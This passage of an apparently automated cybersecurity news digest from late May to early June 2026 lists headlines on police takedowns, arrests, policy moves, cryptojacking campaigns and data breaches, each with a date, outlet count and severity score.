• Geordie Secures $30 Million to Advance AI Agent Security Platform (2026-05-29, 1 outlet, severity 1/5)
  • Geordie Raises $30 Million for AI Security and Governance Platform - SecurityWeek

Legal & Law Enforcement

• Dutch Police Seize 800 Servers and Arrest Two Cybercrime Suspects (2026-05-26, 1 outlet, severity 4/5)
  • Netherlands Seizes 800 Servers, Arrests 2 for Aiding Cyberattacks - Krebs on Security
• Dutch Authorities Disrupt 17 Million Device Botnet and Asocks Infrastructure (2026-05-30, 1 outlet, severity 4/5)
  • Dutch govt disrupts malware botnet with 17 million infected devices - BleepingComputer
• Man Arrested After Exploiting AFC Ajax App and API Vulnerabilities (2026-05-27 to 2026-05-29, 3 outlets, severity 3/5)
  • Dutch police arrests suspect linked to Ajax football club hack - BleepingComputer
  • Dutch police arrest man over cyber breach at Ajax football club - The Record from Recorded Future News
  • Police arrest man following hack of Ajax football club - GRAHAM CLULEY
• Michele Spagnuolo charged for using Google data to trade on Polymarket (2026-05-29, 2 outlets, severity 3/5)
  • Google security engineer accused of turning confidential search trends into $1.2M win on Polymarket - CyberScoop
  • US charges Google security engineer with Polymarket insider trading - BleepingComputer
• THE.Hosting activity persists despite Dutch raid and server seizures (2026-05-29, 1 outlet, severity 3/5)
  • Dutch Raid Fails to Dent Russian Bulletproof Host - darkreading
• Ramanan Pathmanathan Gets 33 Years for Targeting 145 Children (2026-05-28, 1 outlet, severity 3/5)
  • Sextortionist sentenced to 33 years for targeting 145 children - BleepingComputer
• C.A. Cloud Attribution Executives Plead Guilty to Aiding Microsoft Scams (2026-05-26, 1 outlet, severity 3/5)
  • Scammers pretending to be Microsoft had help from US executives - Malwarebytes
• Zachary Sweeney Pleads Not Guilty to 764 Exploitation Charges (2026-05-30, 1 outlet, severity 2/5)
  • Tennessee man linked to 764 accused of series of crimes against children dating back to 2022 - CyberScoop
• Microsoft to forgo legal action against security researchers over vulnerabilities (2026-06-01, 1 outlet, severity 2/5)
  • Microsoft says it will not pursue security researchers after zero-day backlash - The Record from Recorded Future News
• FBI 2025 Internet Crime Report Reveals Latest Cybercrime Statistics (2026-05-28, 1 outlet, severity 1/5)
  • FBI’s 2025 Internet Crime Report - Schneier on Security

Policy & Regulation

• NIST National Vulnerability Database Audit Reveals Mismanagement and Backlogs (2026-05-30, 1 outlet, severity 3/5)
  • Federal audit reveals NIST’s NVD is plagued by poor planning and duplication - CyberScoop
• CERT-In Mandates 12-Hour Patching Window to Combat AI-Driven Attacks (2026-05-26, 1 outlet, severity 3/5)
  • CERT-In Mandates 12-Hour Patching for Internet-Facing Flaws Amid AI-Assisted Attacks - The Hacker News
• Gen. Joshua Rudd Orders Cyber Command Modernization and Acquisition Reviews (2026-05-28, 1 outlet, severity 2/5)
  • Rudd orders Cyber Command reviews as Pentagon presses reform agenda - The Record from Recorded Future News
• White House Memo M-26-14 Mandates Risk-Based Cybersecurity Logging for Agencies (2026-05-27, 1 outlet, severity 2/5)
  • White House charts new course for federal agencies and cybersecurity logging - CyberScoop
• Truesec Report: Nordic CISOs Successfully Contain Rising Cyber Threats (2026-05-28, 1 outlet, severity 2/5)
  • Nordic CISOs Handle Rising Cyber Threats Remarkably Well - darkreading
• TN, FL, and NY Cyber Leaders Seek Increased Federal Funding (2026-05-27, 1 outlet, severity 2/5)
  • State Cyber Leaders Beg Congress for More Funding, Support - darkreading
• HR Acuity Warns Compliance Dashboards Miss Critical Employee Relations Risks (2026-05-28, 1 outlet, severity 2/5)
  • Your Compliance Dashboard Can’t Tell You Everything About Employee Relations - Corporate Compliance Insights
• Trump Executive Order Links College Athletics Compliance to Federal Funding (2026-05-29, 1 outlet, severity 1/5)
  • Executive Order Targets College Athletics Compliance & Federal Funding - Corporate Compliance Insights
• SEC Moves to Rescind Greenhouse Gas Emissions Reporting Rule (2026-05-30, 1 outlet, severity 1/5)
  • SEC Moves to Formally Rescind Climate Reporting Rule - Corporate Compliance Insights
• Zoë Arden: Using Storytelling to Drive Compliance and Culture (2026-06-01, 1 outlet, severity 1/5)
  • Telling the Story of Compliance - Corporate Compliance Insights
• Gartner Analysts Urge Compliance Officers to Adopt Coaching Roles (2026-05-26, 1 outlet, severity 1/5)
  • How Compliance Officers Can Be Better Coaches - Corporate Compliance Insights
• Smarsh, Socure, and Auditoria.AI Announce New GRC Tech Innovations (2026-05-30, 1 outlet, severity 1/5)
  • GRC News Roundup: Smarsh, Socure, CPRS & More - Corporate Compliance Insights

Other Cybersecurity

• Cryptojacking campaign uses SEO poisoning to target high-performance computer systems (2026-05-27 to 2026-05-28, 2 outlets, severity 3/5)
  • AI Chatbot Recommendations Redirect Users to Cryptojacking Malware Sites - The Hacker News
  • GPU mining malware spreads via SEO poisoning, AI chatbots - BleepingComputer
• Russian ShOAB-0.5 Submunitions Found After Mali Military Airstrikes (2026-05-27, 1 outlet, severity 3/5)
  • Banned Russian Submunitions Found After Mali’s Military Announces Airstrikes - bellingcat
• The Com Ecosystem Links Cyberattacks to Violence and Exploitation (2026-05-29, 1 outlet, severity 3/5)
  • 'The Com' Cyberattacks Support Violence & Sexploitation - darkreading
• 2026 FIFA World Cup Faces Rising Global Cyberattack Threats (2026-05-28, 1 outlet, severity 3/5)
  • 2026 World Cup: Discussing The World’s Biggest Game’s Attack Surface - Unit 42
• Apple Open-Sources Quantum-Resistant Encryption and Verification Tools (2026-05-27, 1 outlet, severity 3/5)
  • Apple open-sources quantum-resistant encryption code - CyberScoop
• UIB and CyberCube Report Surge in Asia-Pacific Cyber Insurance (2026-05-30, 1 outlet, severity 3/5)
  • Asia's Cyber Insurance Market Shows Signs of Life - darkreading
• Penney and Schneier Warn Trump Administration Uses Tactics to Suppress Dissent (2026-05-29, 1 outlet, severity 2/5)
  • Chilling Effects - Schneier on Security
• Megaproject Construction Scale Increases Legal Risks and Litigation Exposure (2026-05-29, 1 outlet, severity 2/5)
  • Stadium Booms & Megaprojects: How Construction Scale Is Driving Legal Risk - Corporate Compliance Insights
• OpenAI Unveils Five-Part Plan to Protect 2026 Midterm Elections (2026-05-28, 1 outlet, severity 2/5)
  • OpenAI heralds cybersecurity, election interference safeguard plans for 2026 midterms - CyberScoop
• Anthropic to Release Mythos-Class Models to the Public Soon (2026-05-29, 1 outlet, severity 2/5)
  • Anthropic confirms Claude Mythos-class models will roll out to the public - BleepingComputer
• Rainey Reitman Warns Payment Apps Use Surveillance for Financial Censorship (2026-06-01, 1 outlet, severity 2/5)
  • Payment apps are watching what you say (Lock and Code S07E11) - Malwarebytes
• WiFi Sensing Technology Can Identify People via Radio Signal Patterns (2026-05-27, 1 outlet, severity 2/5)
  • Identifying People Using Wi-Fi Routers - Schneier on Security
• Satellite Imagery Reveals 115 Destroyed Villages in Myanmar’s Rakhine State (2026-05-27, 1 outlet, severity 1/5)
  • The ‘Lost’ Villages of Myanmar’s Rakhine - bellingcat
• RevEng.AI and Lastwall Secure Series A Funding for Security Platforms (2026-05-27, 1 outlet, severity 1/5)
  • RevEng.AI Raises $15 Million to Hunt for Flaws and Backdoors in Software Binaries - SecurityWeek
• Cynomi Leads Shift Toward Security Growth Platforms for MSPs (2026-06-01, 1 outlet, severity 1/5)
  • The Security Growth Platform: Why MSPs Are Moving Beyond vCISO Tools - The Hacker News
• Enron, Blue Bell, and FTX: Lessons in Governance Failure (2026-05-27, 1 outlet, severity 1/5)
  • Enron, Blue Bell & FTX: Revisiting Corporate Governance Failures - Corporate Compliance Insights
• Cisco Talos Launches EvidenceForge for High-Fidelity Synthetic Security Logs (2026-05-27, 1 outlet, severity 1/5)
  • Introducing EvidenceForge: Synthetic security logs that don’t look (as) fake - Cisco Talos Blog
• Corlytics Appoints Lisa Miles-Heal as New Chief Executive Officer (2026-05-30, 1 outlet, severity 1/5)
  • Regtech Firm Corlytics Names New CEO - Corporate Compliance Insights
• Patty Azzarello’s Strategies for Silencing Your Inner Critic (2026-06-01, 1 outlet, severity 1/5)
  • Outsmarting Your Inner Critic - Corporate Compliance Insights
• Prasen Shelar Wins Dark Reading Cartoon Caption Contest With AI Entry (2026-05-30, 1 outlet, severity 1/5)
  • Name That Toon: Mark of (Cybersecurity) Progress - darkreading
• SecurityWeek Releases On-Demand Threat Detection and Incident Response Sessions (2026-05-26, 1 outlet, severity 1/5)
  • Watch on Demand: Threat Detection & Incident Response Summit – All Sessions Available - SecurityWeek
• ISC Stormcast Podcast Covers Daily Security News for June 1st (2026-06-01, 1 outlet, severity 1/5)
  • ISC Stormcast For Monday, June 1st, 2026 https://isc.sans.edu/podcastdetail/9952, (Mon, Jun 1st) - SANS Internet Storm Center, InfoCON: green
• Squid’s New Post Offers Insights Into Current Security News (2026-05-30, 1 outlet, severity 1/5)
  • Friday Squid Blogging: Another Squid - Schneier on Security
• ISC Stormcast May 28, 2026: Threat Level Remains Green (2026-05-28, 1 outlet, severity 1/5)
  • ISC Stormcast For Thursday, May 28th, 2026 https://isc.sans.edu/podcastdetail/9948, (Thu, May 28th) - SANS Internet Storm Center, InfoCON: green
• ISC Stormcast Podcast: May 27, 2026, with Brad Duncan (2026-05-27, 1 outlet, severity 1/5)
  • ISC Stormcast For Wednesday, May 27th, 2026 https://isc.sans.edu/podcastdetail/9946, (Wed, May 27th) - SANS Internet Storm Center, InfoCON: green
• ISC Stormcast May 26th: Daily Cybersecurity Threat Update (2026-05-26, 1 outlet, severity 1/5)
  • ISC Stormcast For Tuesday, May 26th, 2026 https://isc.sans.edu/podcastdetail/9944, (Tue, May 26th) - SANS Internet Storm Center, InfoCON: green
• ISC Stormcast Weekly Cybersecurity Update for May 29, 2026 (2026-05-29, 1 outlet, severity 1/5)
  • ISC Stormcast For Friday, May 29th, 2026 https://isc.sans.edu/podcastdetail/9950, (Fri, May 29th) - SANS Internet Storm Center, InfoCON: green

Reported Data Breaches

Breaches reported via Have I Been Pwned this period.

• Edmunds Data Breach Compromises Over 177,000 User Accounts (2026-06-01)
• Atlas Menu breach exposes over 63,000 user accounts (2026-05-31)
• ShinyHunters Uses Compromised Employee Accounts to Breach Charter and Carnival (2026-05-29)
• ShinyHunters Uses Social Engineering to Breach Kemper Corporation and Carnival Corporation (2026-05-28)
• Mytheresa Data Breach Compromises Over 84,000 User Accounts (2026-05-27)
• ShinyHunters Conducts Salesforce Extortion Campaigns Against Ameriprise Financial and Charter Communications (2026-05-27)